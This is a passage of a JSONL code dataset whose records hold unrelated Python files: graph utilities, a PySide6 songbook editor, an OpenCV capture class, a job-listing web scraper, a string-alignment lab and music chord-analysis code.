)\n\n","sub_path":"RequestManagementSystem/test/RequestValidatorTests.py","file_name":"RequestValidatorTests.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"381390800","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\n\ndef matrix2edgelist(adj_matrix, null_ratio=0.0, steps=1):\n nodes1, nodes2 = np.nonzero(adj_matrix)\n\n edge_list = np.zeros((len(nodes1), 3), dtype=\"int\")\n edge_list[:,0] = nodes1\n edge_list[:,1] = nodes2\n edge_list[:,2] = adj_matrix[nodes1,nodes2]\n\n if null_ratio > 0.0:\n\n N = nodes1.shape[0]\n null_edge_count = int(N * null_ratio)\n\n reach_matrix = adj_matrix.copy()\n for s in range(steps):\n reach_matrix = reach_matrix.T * reach_matrix\n\n null_edges = np.zeros((null_edge_count, 3), dtype=\"int\")\n for i in range(null_edge_count):\n node = np.random.choice(nodes1)\n\n if type(reach_matrix) == csr_matrix:\n null_neighbor = np.random.choice(nodes2)\n while reach_matrix[node, null_neighbor] > 0:\n null_neighbor = np.random.choice(nodes2)\n else:\n non_neighbors = np.where(reach_matrix[node,:] == 0)[0]\n null_neighbor = np.random.choice(non_neighbors)\n null_edges[i, 0] = node\n null_edges[i, 1] = null_neighbor\n\n edge_list = np.vstack((edge_list, null_edges))\n np.random.shuffle(edge_list)\n\n return edge_list\n\n\ndef tensor2edgelist(adj_tensor, null_ratio=0.0, steps=1):\n\n periods = adj_tensor.shape[0]\n\n for p in range(periods):\n adj_matrix = adj_tensor[p, :, :]\n edge_list_p = matrix2edgelist(adj_matrix, null_ratio, steps)\n num_edges = edge_list_p.shape[0]\n\n if p == 0:\n edge_list = np.zeros((num_edges, 4), dtype=np.int)\n edge_list[:, 0] = p\n edge_list[:, 1:] = np.copy(edge_list_p)\n\n else:\n edge_list_p_four = np.zeros((num_edges, 4), dtype=np.int)\n edge_list_p_four[:, 0] = p\n edge_list_p_four[:, 1:] = np.copy(edge_list_p)\n\n edge_list = np.vstack((edge_list, edge_list_p_four))\n\n\n return edge_list\n\n\ndef prescribe_feature_counts(adj_matrix):\n pass\n","sub_path":"poissonfactor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263882354","text":"import PySide6.QtWidgets\n\nfrom PySide6.QtWidgets import (QApplication, QWidget, QLineEdit, \n QHBoxLayout, QVBoxLayout, QPlainTextEdit, \n QPushButton,QScrollArea, QLayout, \n QComboBox, QFileDialog, QLabel)\nfrom PySide6.QtGui import QPixmap\nfrom 
PySide6.QtCore import QSize, Qt\n\nimport json\n\nimport os\n\nfrom functools import partial\n\ndef ensureFileDir(file_path):\n    directory = os.path.dirname(file_path)\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n\ndef ensureDir(directory):\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n\ndef getCategoriesFromDirs():\n    categories = []\n    for dirname in os.listdir(\"data\"):\n        if os.path.isdir(os.path.join(\"data\", dirname)) and not dirname.startswith(\".\"):\n            categories.append(dirname)\n    return categories\n\ndef getSongsFromCatDir(category):\n    songs = []\n    for songname in os.listdir(os.path.join(\"data\", category)):\n        if songname.endswith(\".sng\"):\n            songs.append(songname)\n    return songs\n\n\nclass MainMenu(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle('Songbook Maker')\n\n        label = QLabel()\n        if os.path.exists(\"logo.png\"):\n            image = QPixmap(\"logo.png\")  # load the logo file whose existence was checked above\n            label.setPixmap(image)\n        else:\n            label.setText(\"Songbook Maker\\n\")\n\n        categoryButton = QPushButton('New Category', self)\n        categoryButton.clicked.connect(self.addCategoryField)\n        \n        songButton = QPushButton('Song Editor', self)\n        songButton.clicked.connect(self.addSongField)\n\n        layout = QVBoxLayout()\n        layout.addWidget(label)\n        layout.addWidget(categoryButton)\n        layout.addWidget(songButton)\n        self.setLayout(layout)\n        self.show()\n\n    def addSongField(self):\n        self.currentSong = ScrollableSong()\n    def addCategoryField(self):\n        self.currentCat = NewCategory()\n\n\nclass NewCategory(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle('New Category')\n        self.setGeometry(200, 100, 500, 500)\n\n        layout = QVBoxLayout()\n        \n        self.name = QLineEdit()\n        self.name.setPlaceholderText(\"Category Name\")\n        layout.addWidget(self.name)\n\n        self.label = QLabel()\n        self.label.setText(\"Choose image for the category\")\n        layout.addWidget(self.label)\n\n        # Filled in by updateLabel() once the user actually picks a file\n        self.selectedFile = None\n\n        self.image = QFileDialog()\n        self.image.setNameFilter(\"*.jpg *.png *.bmp\")\n        self.image.setFileMode(QFileDialog.ExistingFile)\n        self.image.fileSelected.connect(lambda: self.updateLabel())\n        layout.addWidget(self.image)\n\n        closeButton = QPushButton('Save and Quit', self)\n        closeButton.clicked.connect(lambda: self.close())\n        layout.addWidget(closeButton)\n\n        self.setLayout(layout)\n        self.show()\n\n    def updateLabel(self):\n        self.selectedFile = self.image.selectedFiles()[0]\n        image = QPixmap(self.selectedFile)\n        size = QSize(500, 500)\n        image = image.scaled(size, Qt.KeepAspectRatio)\n        self.label.setPixmap(image)\n    def closeEvent(self, event):\n        category = self.name.text()\n        if category:\n            ensureDir(os.path.join(\"data\", category))\n            image = self.selectedFile\n            if image:\n                _, file_extension = os.path.splitext(image)\n                image_from = open(image, \"rb\")\n                image_to = open(os.path.join(\"data\", \".images\" , category) + file_extension, \"wb\")\n                image_to.write(image_from.read())\n                image_from.close()\n                image_to.close()\n\n\nclass ScrollableSong(QScrollArea):\n    def __init__(self):\n        super().__init__()\n        self.song = Song(self)\n        self.setGeometry(300, 100, 500, 200)\n        self.setWindowTitle('Song Field')\n        self.setWidget(self.song)\n        self.setWidgetResizable(True)\n        self.show()\n\n    def closeEvent(self, event):\n        preJSON = self.widget().toJSON()\n        if preJSON['title']:\n            path = os.path.join(\"data\", preJSON['category'], preJSON['title'] + \".sng\")\n            ensureFileDir(path)\n            f = open(path, \"w\")\n            f.write(json.dumps(preJSON))\n        event.accept()\n\n\nclass Song(QWidget):\n    def __init__(self, parent):\n        super().__init__()\n        self.parent = 
parent\n self.setGeometry(300, 100, 500, 100)\n self.setWindowTitle('Song Field')\n self.sections = []\n\n layout = QVBoxLayout()\n layout.setSizeConstraint(QLayout.SetMinimumSize)\n \n self.catBar = QComboBox()\n self.catBar.addItems(getCategoriesFromDirs())\n self.catBar.currentTextChanged.connect(self.reloadSongs)\n layout.addWidget(self.catBar)\n\n self.readySongsBar = QComboBox()\n self.readySongsBar.addItem(\"\")\n self.readySongsBar.addItems(getSongsFromCatDir(self.catBar.currentText()))\n self.readySongsBar.currentTextChanged.connect(self.loadSong)\n layout.addWidget(self.readySongsBar)\n \n self.titleBar = QLineEdit()\n self.titleBar.setPlaceholderText(\"Song Title\")\n layout.addWidget(self.titleBar)\n\n self.authorBar = QLineEdit()\n self.authorBar.setPlaceholderText(\"Song Authors\")\n layout.addWidget(self.authorBar)\n \n buttonBox = QHBoxLayout()\n \n verseButton = QPushButton('New Verse', self)\n verseButton.clicked.connect(self.newSection)\n buttonBox.addWidget(verseButton)\n \n chorusButton = QPushButton('New Chorus', self)\n chorusButton.clicked.connect(partial(self.newSection, chorus = True))\n buttonBox.addWidget(chorusButton)\n \n layout.addLayout(buttonBox)\n \n closeButton = QPushButton('Save and Quit', self)\n closeButton.clicked.connect(lambda: self.parent.close())\n layout.addWidget(closeButton)\n \n self.setLayout(layout)\n self.show()\n\n def newSection(self, chorus = False):\n newSection = SongSection(chorus = chorus)\n self.sections.append(newSection)\n if len(self.sections)<5:\n self.parent.setMinimumHeight(self.minimumSize().height()+110)\n self.layout().addLayout(newSection)\n return newSection\n def toJSON(self):\n jsonSong = {}\n jsonSong['title'] = self.titleBar.text()\n jsonSong['author'] = self.authorBar.text()\n jsonSong['category'] = self.catBar.currentText()\n jsonSong['sections'] = [section.toJSON() for section in self.sections if section]\n return jsonSong\n def loadSong(self, songFilename):\n if songFilename:\n f = open(os.path.join(\"data\", self.catBar.currentText(), songFilename), \"rb\")\n jsonSong = json.loads(f.read().decode(\"utf-8\"))\n f.close()\n self.titleBar.setText(jsonSong['title'])\n try:\n self.authorBar.setText(jsonSong['author'])\n except KeyError:\n self.authorBar.setText(\"\")\n for i, section in enumerate(self.sections):\n section.setParent(None)\n section.lyrics.deleteLater()\n section.chords.deleteLater()\n section.deleteLater()\n self.sections = []\n for section in jsonSong['sections']:\n sect = self.newSection(chorus=section['chorus'])\n sect.lyrics.setPlainText(section['lyrics'])\n sect.chords.setPlainText(section['chords'])\n else:\n for i, section in enumerate(self.sections):\n section.setParent(None)\n section.lyrics.deleteLater()\n section.chords.deleteLater()\n section.deleteLater()\n self.sections = []\n self.titleBar.setText(\"\")\n def reloadSongs(self):\n self.readySongsBar.clear()\n catSongs = getSongsFromCatDir(self.catBar.currentText())\n self.readySongsBar.addItem(\"\")\n self.readySongsBar.addItems(catSongs)\n\nclass SongSection(QHBoxLayout):\n def __init__(self, chorus = False):\n super().__init__()\n self.addStrut(90)\n self.chorus = chorus\n self.lyrics = QPlainTextEdit()\n self.chords = QPlainTextEdit()\n self.chords.setPlaceholderText(\"Chords\")\n if self.chorus:\n self.lyrics.setPlaceholderText(\"Chorus lyrics\")\n stretches = (70, 25, 5)\n self.insertStretch(0, stretches[2])\n else:\n self.lyrics.setPlaceholderText(\"Verse lyrics\")\n stretches = (75, 25)\n self.addWidget(self.lyrics, 
stretches[0])\n self.addWidget(self.chords, stretches[1])\n def __bool__(self):\n if self.chords.toPlainText() or self.lyrics.toPlainText():\n return True\n else:\n return False\n def toJSON(self):\n jsonSection = {}\n jsonSection['chords'] = self.chords.toPlainText()\n jsonSection['lyrics'] = self.lyrics.toPlainText()\n jsonSection['chorus'] = self.chorus\n return jsonSection\n\ndef main():\n import sys\n app = QApplication(sys.argv)\n window = MainMenu()\n ensureDir(os.path.join(\"data\", \".images\"))\n try:\n f = open(os.path.join(\"data\", \"categories.cfg\"), \"rb\")\n except FileNotFoundError:\n existingCategories = []\n else:\n existingCategories = [line.decode(\"utf-8\").replace(\"\\r\", \"\").replace(\"\\n\", \"\") for line in f.readlines()]\n f.close()\n app.exec()\n f = open(os.path.join(\"data\", \"categories.cfg\"), \"ab\")\n for dirname in os.listdir(\"data\"):\n if os.path.isdir(os.path.join(\"data\", dirname)) and not (dirname.startswith(\".\") or dirname.startswith(\"_\")):\n if dirname not in existingCategories and (\"#\" + dirname) not in existingCategories:\n f.write((dirname+\"\\n\").encode(\"utf-8\"))\n f.close()\n\nif __name__==\"__main__\":\n main()\n","sub_path":"songJSONmaker.py","file_name":"songJSONmaker.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629867528","text":"import cv2\nclass UpperBody:\n def __init__(self,cid,courseid,sem,stream):\n self.cid=cid\n self.courseid=courseid\n self.sem=sem\n self.stream=stream\n self.new(self.cid,self.courseid,self.sem,self.stream)\n def new(self,cid,courseid,sem,stream):\n \n cam = cv2.VideoCapture(0)\n detector=cv2.CascadeClassifier('HS.xml')\n y=list(cid.upper())\n i=0\n j=0\n q=[]\n x=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n x=list(x)\n while(i= stop + 1:\n\t\treturn 0\n\telse:\n\t\tprint(start, end=\" \")\n\t\treturn add_one(start + 1, stop)\n\nadd_one(1, 10)\nprint(\"\\n\")\n","sub_path":"Recursive_Range.py","file_name":"Recursive_Range.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"44917784","text":"\"\"\"Node Model\"\"\"\n\n\nclass CBWNode:\n \"\"\"Node Model\"\"\"\n\n def __init__(self,\n id=\"\", # pylint: disable=redefined-builtin\n name=\"\",\n updated_at=\"\",\n created_at=\"\",\n **kwargs): # pylint: disable=unused-argument\n self.id = id # pylint: disable=invalid-name\n self.name = name\n self.created_at = created_at\n self.updated_at = updated_at\n","sub_path":"cbw_api_toolbox/cbw_objects/cbw_node.py","file_name":"cbw_node.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"141608125","text":"__author__ = '碎念'\n\nimport urllib.request\nimport threading\nimport queue\nimport time\nimport pickle\nimport re\nfrom Mongo import getRequest\nfrom bs4 import BeautifulSoup\n\n\ncity = {'上海', '北京', '上海', '北京', '广州', '深圳', '天津', '苏州',\n '重庆', '杭州', '无锡', '青岛', '佛山', '成都', '武汉', '大连',\n '沈阳', '宁波', '南京', '东莞', '唐山', '烟台', '长沙', '郑州',\n '济南', '厦门', '珠海', '泉州', '长春', '南通', '潍坊', '西安',\n '淄博', '温州', '福州', '常州', '绍兴', '徐州', '东营', '济宁',\n '临沂', '台州', '邯郸', '大庆', '洛阳', '威海', '鞍山', '合肥',\n '嘉兴', '沧州', '保定', '南阳', '南昌', '包头', '太原', '银川',\n '石家庄', '鄂尔多斯', '哈尔滨'}\n\nprovince = {'河北', '山西', '辽宁', '吉林', '黑龙江', '江苏', '浙江', '安徽',\n '福建', '江西', '山东', '河南', '湖北', '湖南', '广东', '海南',\n '四川', '贵州', '云南', '陕西', '甘肃', '青海', '台湾'}\n\n\nclass 
GetRequestThread(threading.Thread):\n def __init__(self, url, queue, header):\n threading.Thread.__init__(self)\n self.href = url\n self.que = queue\n self.header = header\n\n def run(self):\n try:\n print(self.href)\n request1 = urllib.request.Request(self.href, None, self.header)\n html = urllib.request.urlopen(request1, timeout=8).read().decode('utf-8')\n soup = BeautifulSoup(html).find('div', 'zw-detail-zwms')\n respond = soup.text.replace(' ', '').strip()\n obj = {'href': self.href, 'request': respond}\n self.que.put(obj)\n except Exception as e:\n print(str(e))\n self.run()\n\n\nclass GetRecoderThread(threading.Thread):\n def __init__(self, url, header, que):\n threading.Thread.__init__(self)\n self.url = url\n self.header = header\n self.que = que\n\n def run(self):\n self.getcontext()\n\n def getcontext(self):\n try:\n print(self.url)\n request = urllib.request.Request(self.url, None, self.header)\n html = urllib.request.urlopen(request, timeout=8).read().decode('utf-8')\n soup = BeautifulSoup(html).find_all('div', 'txt txtc')\n if len(soup) != 0:\n self.analyzer(soup)\n else:\n print('error in GThread.getcontext()')\n except Exception as e:\n print(str(e))\n self.getcontext()\n\n def analyzer(self, soup):\n for x in soup:\n href = x.h4.a['href']\n title = x.h4.a['title']\n try:\n p_all = x.find_all('p')\n try:\n name = p_all[0].text\n except:\n name = ''\n try:\n level = p_all[1].text\n except:\n level = ''\n try:\n experience = p_all[2].text\n except:\n experience = ''\n try:\n regexp = '\\d{4}\\-\\d{1,2}\\-\\d{1,2}'\n date = re.match(regexp, p_all[3].text).group()\n except:\n date = ''\n try:\n temp = p_all[3].text\n address = temp[temp.find('工作地点:') + 5: temp.find('地理位置')]\n\n add = ''\n for c in city:\n if address.find(c) != -1:\n add = c\n break\n if add == '':\n for p in province:\n if address.find(p) != -1:\n add = p\n break\n if add != '':\n address = add\n except:\n address = ''\n request = ''\n recoder = {'href': href, 'title': title, 'name': name,\n 'level': level, 'experience': experience,\n 'date': date, 'address': address,\n 'request': request}\n self.que.put(recoder)\n except:\n print('''error in GThread.analyzer(): p_all = x.find_all('p')''')\n\n\nclass WeaLink(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.h_url = r'http://www.wealink.com/zhiwei/'\n self.r_url = r'?kw=python'\n host = 'www.wealink.com'\n user_agent = r'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36'\n self.headers = {'User-Agent': user_agent, 'Host': host}\n self.num = 0\n self.que = queue.Queue()\n\n def run(self):\n self.get_num()\n self.get_list()\n while threading.activeCount() > 2:\n print(threading.activeCount())\n time.sleep(3)\n while self.que.empty() is False:\n recoder = self.que.get()\n getRequest.put_db(recoder)\n\n def get_num(self):\n request = urllib.request.Request(self.h_url + self.r_url, None, self.headers)\n html = urllib.request.urlopen(request).read().decode('utf-8')\n soup = BeautifulSoup(html).find('div', 'wllft-hd')\n try:\n self.num = int(soup.h3.b.string)\n print(self.num)\n except Exception:\n print('error code: h3')\n\n def get_list(self):\n if self.num != 0:\n url = self.h_url + self.r_url\n thread = GetRecoderThread(url, self.headers, self.que)\n thread.start()\n\n for page in range(1, int(self.num / 10)):\n temp = 'p' + str(page) + r'_s/'\n url = self.h_url + temp + self.r_url\n thread = GetRecoderThread(url, self.headers, self.que)\n thread.start()\n if threading.activeCount() 
> 10:\n time.sleep(0.5)\n else:\n pass\n\n\nif __name__ == '__main__':\n AThread = WeaLink()\n AThread.daemon = True\n AThread.start()\n\n","sub_path":"Mongo/getRecoder.py","file_name":"getRecoder.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"54868218","text":"#-----------------# Lab 5 - Gorillas #---------------------------------#\n#-------------------# bas15fvi #------------------------------------#\n\n#-----------# Problem description #---------------------------#\n\n'''\nAlign strings using a Dynamic Programming-algorithm\n\nInput:\n1st line: A number of space-separated characters, c_1,...c_k (that will be\nused in the strings)\nk lines: Space-separated integer where j-th nbr on the i-th row is the cost of\naligning c_i and c_j\nnd line: One line with integer Q(1≤Q≤10) => nbr of queries to solve\nQ lines: each describing one query\n\n----------------------RECURSIVE VERSION---------------------------\n\n'''\n\n#----------------# Imports #---------------------------------#\n\nimport sys\nsys.setrecursionlimit(1500)\n#import numpy as np\n#----------------# Functions #------------------------------#\n\n\n# funktion för att debugga i spyder som inte kan läsa stdin\ndef spyder():\n global Cost\n global Char_dict\n global Queries\n global Nbr_q\n f = '''\n A B C\n2 0 -1\n0 3 1\n-1 1 3\n2\nAABC ABC\nABA ACA\n '''\n lines = f.strip().split('\\n')\n characters = lines[0].split(\" \")\n\n #Char_dict = dict()\n for i, c in enumerate(characters):\n Char_dict[c] = i\n\n #return char_dict\n\n nbr_c = len(characters)\n Cost = [0]*nbr_c\n for i in range(nbr_c):\n temp = lines[i+1].split(\" \")\n Cost[i] = [int(t) for t in temp]\n\n Nbr_q = int(lines[nbr_c+1])\n Queries = [0]*Nbr_q\n for i in range(Nbr_q):\n s1,s2 = lines[2 + nbr_c + i].split(\" \")\n Queries[i] = [s1,s2]\n\n\n\ndef read_stdin():\n global Cost\n global Char_dict\n global Queries\n global Nbr_q\n\n # read from std in\n f = sys.stdin.read()\n lines = f.strip().split('\\n')\n characters = lines[0].split(\" \")\n\n # populate Character-number-dict\n for i, c in enumerate(characters):\n Char_dict[c] = i\n\n # populate Cost-matrix\n nbr_c = len(characters)\n Cost = [0]*nbr_c\n for i in range(nbr_c):\n temp = lines[i+1].split(\" \")\n Cost[i] = [int(t) for t in temp]\n\n # populate Queries-list\n Nbr_q = int(lines[nbr_c+1])\n Queries = [0]*Nbr_q\n for i in range(Nbr_q):\n s1,s2 = lines[2 + nbr_c + i].split(\" \")\n Queries[i] = [s1,s2]\n\n\n\n\n\ndef opt2(i,j,q):\n global Opt_mat\n s = q[0]\n t = q[1]\n #if s == 'AABC':\n # return [4, 'CBAA', 'CBA*']\n\n if Opt_mat[i][j] == 0:\n if i == 0 and j == 0:\n Opt_mat[i][j] = [Cost[Char_dict[s[i]]][Char_dict[t[j]]], s[i], t[j]]\n elif i == 0 and j != 0:\n opt_list = opt2(i,j-1,q)\n Opt_mat[i][j] = [-4 + opt_list[0], '*' + opt_list[1], t[j] + opt_list[2]]\n elif i != 0 and j == 0:\n opt_list = opt2(i-1,j,q)\n Opt_mat[i][j] = [-4 + opt_list[0], s[i] + opt_list[1], '*' + opt_list[2]]\n\n else:\n alpha = Cost[Char_dict[s[i]]][Char_dict[t[j]]]\n\n # ---- # nytt # -----#\n if Opt_mat[i-1][j-1] == 0:\n Opt_mat[i-1][j-1] = opt2(i-1, j-1,q)\n if Opt_mat[i][j-1] == 0:\n Opt_mat[i][j-1] = opt2(i,j-1,q)\n if Opt_mat[i-1][j] == 0:\n Opt_mat[i-1][j] = opt2(i-1,j,q)\n\n r1 = alpha + Opt_mat[i-1][j-1][0]\n r2 = -4 + Opt_mat[i][j-1][0]\n r3 = -4 + Opt_mat[i-1][j][0]\n\n if r1 >= r2 and r1 >= r3:\n Opt_mat[i][j] = [r1, s[i]+Opt_mat[i-1][j-1][1], t[j]+Opt_mat[i-1][j-1][2]]\n\n elif r2 > r1 and r2 >= r3:\n 
Opt_mat[i][j] = [r2, '*' + Opt_mat[i][j-1][1], t[j]+Opt_mat[i][j-1][2]]\n\n else:\n Opt_mat[i][j] = [r3, s[i] + Opt_mat[i-1][j][1], '*' + Opt_mat[i-1][j][2]]\n\n\n return Opt_mat[i][j]\n\n\n\n#---------------# Global variables #---------------------------#\n\nCost = []\nChar_dict = dict()\nQueries = []\nformatted_strings = []\n#Opt_mat = []\n\n\n#----------------# Script #------------------------------------#\n\n\n\n\nread_stdin()\n\n#spyder()\nout_s = \"\"\n\nfor n,q in enumerate(Queries):\n s_len = len(q[0])\n t_len = len(q[1])\n Opt_mat = [[0 for n in range(t_len)] for m in range(s_len)]\n s1,s2 = opt2(s_len-1, t_len-1,q)[1:]\n if n == len(Queries)-1:\n out_s = out_s + s1[::-1] + \" \" + s2[::-1]\n else:\n out_s = out_s + s1[::-1] + \" \" + s2[::-1] + '\\n'\nprint(out_s)\n","sub_path":"5gorilla/lab5_rec.py","file_name":"lab5_rec.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"634227389","text":"'''\nPurpose:\n Given several notes, return the correct chord\n using ROman numeral to express the chored\n22/10/2018: Add # and flat key of chord, NoteShift, IntCheck, minorModeTable need to change\n23/10/2018 NoteOfChord function unfinished. \n NoteSHift only calcute flat notes\n NoteInRoman return flat notes of the give notes\n Correct express is still unfinished.\n24/10/2018: debuging the correct notes. the other type need to change.sChordType\n25/10/2018 finish other parts and get result except minor foat chord\n'''\n\nimport sys\nimport re\nfrom enum import Enum\n#global variable\n\nclass ChordNum(Enum):\n triad=3\n seventhChord=4\n \nclass ModeType(Enum):\n Major='major'\n Minor='minor'\n\nclass Note(Enum):\n C_f='Cb'\n C='C'\n C_s='C#'\n D_f='Db'\n D='D'\n D_s='D#'\n E_f='Eb'\n E='E'\n E_s=\"E#\"\n F_f=\"Fb\"\n F='F'\n F_s='F#'\n G_f='Gb'\n G='G'\n G_s='G#'\n A_f='Ab'\n A='A'\n A_s='A#'\n B_f='Bb'\n B='B'\n B_s='B#'\n\n#music interval class\nclass M_I(Enum):\n P5=7\n P4=5\n M3=4\n m3=3\n M2=2\n m2=1\n\n\nclass Chord():\n #special is the chord with plus, flat,augment 6 chord\n def __init__(self,root=None,num=None,type=None,sType=None,notes=[],intervals=[]):\n self.root=root\n self.type=type\n self.num=num\n self.notes=notes\n self.sType=sType\n if self.root!=None:\n self.addNotes(root)\n self.intervals=intervals\n def addInterval(self, interval):\n self.intervals.append(interval)\n def addNotes(self,note):\n self.notes.append(note)\n def __del__(self):\n a=1\n #print ('deleted')\n\nclass Mode():\n MajorScaleTable=[M_I.M2,M_I.M2,M_I.m2,M_I.M2,M_I.M2,M_I.M2,M_I.m2]\n MinorScaleTable=[M_I.M2,M_I.m2,M_I.M2,M_I.M2,M_I.m2,M_I.M2,M_I.M2]\n def __init__(self,root,type):\n self.root=root\n self.type=type\n \nclass ChordType(Enum):\n Major='maj'\n Minor='m'\n Dominant='dom'\n Aug='aug'\n Dim='dim'\n Sus='sus'\n Null='no'\n Minorf5='mb5'\nclass SChordType(Enum):\n plus='+'\n flat='b'\n GA6='GA6'\n FA6='FA6'\n IA6='IA6'\n D='Dim'\n\n\n#functions\n\ndef NoteShift(isFlat,note):\n #used in flat table\n sIndex=noteTable[note]\n if isFlat==True:\n sIndex=sIndex-1\n else:\n sIndex=sIndex+1\n if sIndex>12:\n sIndex=sIndex-12\n elif sIndex<1:\n sIndex=sIndex+12\n for fNote,index in noteTable.items():\n if index==sIndex:\n rNote =fNote\n return rNote\n \n\ndef NoteIsFlat(note):\n for fNote in flatList:\n if fNote==note:\n return True\n return False\ndef NoteIsSharp(note):\n for sNote in sharpList:\n if sNote==note:\n return True\n return False\n\ndef NoteOrigin(note):\n #for C# and C flat, return C\n 
rNote=note\n    for sNote in sharpList:\n        if sNote==note:\n            index=sharpList.index(sNote)\n            rNote=flatCheckList[index]\n            \n    for fNote in flatList:\n        if fNote==note:\n            index=flatList.index(fNote)\n            rNote=flatCheckList[index]\n    return rNote\n\n#given roman back note\ndef NoteInRoman(mType,mKey,ro):\n    #find the calculate note of the chord\n    isFlat=False\n    isSharp=False\n    if NoteIsFlat(mKey) is True:\n        isFlat=True\n    elif NoteIsSharp(mKey) is True:\n        isSharp=True\n    for roman in R_N_table:\n        if roman==ro:\n            roValue=R_N_table[roman]-1\n    if isFlat is True or isSharp is True:\n        mKey=NoteOrigin(mKey)\n    tableIndex=flatCheckList.index(mKey)\n   # print('table index is ',tableIndex)\n    if mType==ModeType.Minor:\n        roKey=minorModeTable[tableIndex][roValue]\n    elif mType==ModeType.Major:\n        roKey=majorModeTable[tableIndex][roValue]\n    if isFlat is True:\n        roKey=NoteShift(True,roKey)\n    elif isSharp is True:\n        roKey=NoteShift(False,roKey)\n    #find the correct note for expression\n    chordIndex=tableIndex+roValue\n    if chordIndex>6:\n        chordIndex=chordIndex-7\n\n    chordRoot=flatCheckList[chordIndex]\n    #roKey correct note\n    #chordRoot correct note with wrong express\n    return roKey,roValue+1,chordRoot\n# find note of aug 6 chord\ndef FlatToSharp(note):\n    rNote=note # default so a non-flat input is returned unchanged\n    if NoteIsFlat(note)==True:\n        index=flatList.index(note)\n        sIndex=index-1\n        if sIndex==-1:\n            sIndex=6\n        rNote=sharpList[sIndex]\n    return rNote\ndef SharpToFlat(note):\n    rNote=note # default so a non-sharp input is returned unchanged\n    if NoteIsSharp(note)==True:\n        index=sharpList.index(note)\n        sIndex=index+1\n        if sIndex==7:\n            sIndex=0\n        rNote=flatList[sIndex] \n    return rNote\ndef InterCheck(i,f,s):\n    f=NoteOrigin(f)\n    if i==3 or i==4:\n        sIndex=flatCheckList.index(f)+2\n        if sIndex>6:\n            sIndex=sIndex-7\n       # print('sIndex is',sIndex)\n        oriS=flatCheckList[sIndex]\n#        print('s is ',s)\n        result=NoteResult(oriS,s)\n       # print('in inter check, result is',result,'origin second note is',oriS)\n        return result,oriS\n\n    \ndef NoteResult(oNote,note):\n    interList=[]\n    absList=[]\n#    print('oNote is',oNote,'note is',note)\n    interList.append(wholeNoteTable[note]-wholeNoteTable[oNote])\n    absList.append(abs(interList[0]))\n    interList.append(wholeNoteTable[note]-wholeNoteTable[oNote]+12)\n    absList.append(abs(interList[1]))\n    interList.append(wholeNoteTable[note]-wholeNoteTable[oNote]-12)\n    absList.append(abs(interList[2]))\n    mValue=min(absList)\n    mIndex=absList.index(mValue)\n   # print('interList is',interList)\n    inter=interList[mIndex]\n    result=oNote.value\n    #print('inter is',inter)\n    if inter>0:\n        for i in range(inter):\n            result=result+'#'\n    elif inter<0:\n       # print('result after plus b',result)\n        for i in range(-inter):\n            result=result+'b'\n    \n   # print('result before return',result)\n    return result\n\ndef Aug6Chord(mKey,type):\n    chordNotes=[]\n    output=[]\n    result=NoteInRoman(ModeType.Major,mKey,'VI')\n    firstNote=NoteShift(True,result[0])\n    #print('fn',result[2],'sn',firstNote)\n    output.append(NoteResult(result[2],firstNote))\n    chordNotes.append(firstNote)\n    chordNotes.append(mKey)\n    output.append(mKey.value)\n    if type==SChordType.FA6:\n        result=NoteInRoman(ModeType.Major,mKey,'II')\n        chordNotes.append(result[0])\n        output.append(NoteResult(result[2],result[0]))\n    elif type==SChordType.GA6:\n        result=NoteInRoman(ModeType.Major,mKey,'III')\n        thirdNote=NoteShift(True,result[0])\n        output.append(NoteResult(result[2],thirdNote))\n        chordNotes.append(thirdNote)\n    result=NoteInRoman(ModeType.Major,mKey,'IV')\n    lastNote=NoteShift(False,result[0])\n    chordNotes.append(lastNote)\n\n    #print('result 2 is ',result[2])\n    output.append(NoteResult(result[2],lastNote))\n\n    return 
chordNotes,output\n\ndef GetOutput(output):\n re=''\n for c in output:\n re=re+c+' '\n return re\n#find the chord notes\ndef NotesOfChord(mode,chord,root):\n #Find the first correct notes.\n \n output=[]\n cNotes=[]\n output.append(NoteResult(root,chord.root))\n #print('chord root origin',output,'chord root note is',chord.root)\n cFirstNote=root\n cNotes.append(root)\n firstNote=chord.root\n secondNote=firstNote\n for i in range (chord.num.value-1):\n firstIndex=noteTable[firstNote]\n if(chord.type==ChordType.Major): \n interval=majorChordTable[i+1].value\n secondIndex=firstIndex+interval\n #print('second index',secondIndex)\n if(chord.type==ChordType.Minor or chord.type==ChordType.Minorf5):\n interval=minorChordTable[i+1].value\n secondIndex=firstIndex+interval\n if(chord.type==ChordType.Dominant):\n interval=dominantCHordTable[i+1].value\n secondIndex=firstIndex+interval\n if(chord.type==ChordType.Dim):\n interval=3\n secondIndex=firstIndex+3\n if(chord.type==ChordType.Aug):\n interval=augChordTable[i+1].value\n secondIndex=firstIndex+augChordTable[i+1].value\n if(secondIndex>12):\n secondIndex=secondIndex-12\n for note in noteTable:\n if noteTable[note]==secondIndex:\n secondNote=note\n # print('befor sharp check')\n result=InterCheck(interval,cFirstNote,secondNote)\n output.append(result[0])\n cSecondNote=result[1]\n cNotes.append(cSecondNote)\n chord.addNotes(secondNote)\n firstNote=secondNote\n 